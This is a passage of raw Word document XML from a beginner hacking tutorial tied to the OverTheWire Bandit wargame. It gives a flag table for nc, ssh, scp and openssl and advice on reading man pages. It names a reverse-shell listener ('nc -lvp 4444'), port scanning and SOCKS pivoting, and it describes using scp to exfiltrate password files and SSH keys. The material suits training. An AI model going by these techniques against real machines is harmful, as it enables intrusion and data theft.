          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In real engagements, scp is how you transfer tools to a compromised machine and how you exfiltrate (copy out) interesting files you find — password files, SSH keys, config files, databases. Once you have SSH access to a machine, scp gives you full file access to it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Quick Reference — Most Used Flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The flags you will actually use in the next 3 months, all in one place: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60"/>
        <w:gridCol w:w="290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Tool</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Flag</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Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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When you use it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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">nc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Listen mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Catching reverse shells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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">nc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-lvp 4444</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Listen, verbose, on port 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Standard reverse shell listener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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">nc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-zv host 1-1000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Port scan range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Quick recon of open ports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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">nc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-w 3</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 second timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Fast scanning without hanging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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">openssl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-connect h:p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Connect to SSL host:port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Every SSL challenge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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">openssl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-quiet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No certificate noise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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When piping data through openssl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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh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-p 2220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Custom port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Bandit and non-standard servers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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh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-i key.pem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Use private key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Key-based auth on any server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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh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-v</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Verbose debug</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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When connection fails silently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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh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-L local:host:remote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Local port forward</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Accessing internal services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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh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-D 1080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SOCKS proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Pivoting through a machine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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">scp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-P 2220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Custom port (capital P)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Bandit file transfers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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">scp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Recursive (whole folder)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Copying directories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21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">scp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-i key.pem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Use private key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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i/>
                <w:iCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Key-based file transfers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">6. The Most Important Habit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This document covers the flags you need right now. But every tool has more options than any document covers. The skill that separates average hackers from good ones is comfort with documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For any command you do not understand — before Googling, try this first:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">man nc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">man ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">man scp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">man openssl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The man pages are always accurate, always up to date, and always on the machine you are working on. Getting comfortable reading them is a skill that pays off for the rest of your career.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="12"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On Bandit: every level page at overthewire.org lists the man pages relevant to that level. Read them before attempting. This is not cheating — this is exactly what real engineers and hackers do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Document — Go complete Bandit Level 15.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2026-04-06T08:43:28.637Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T08:43:28.638Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>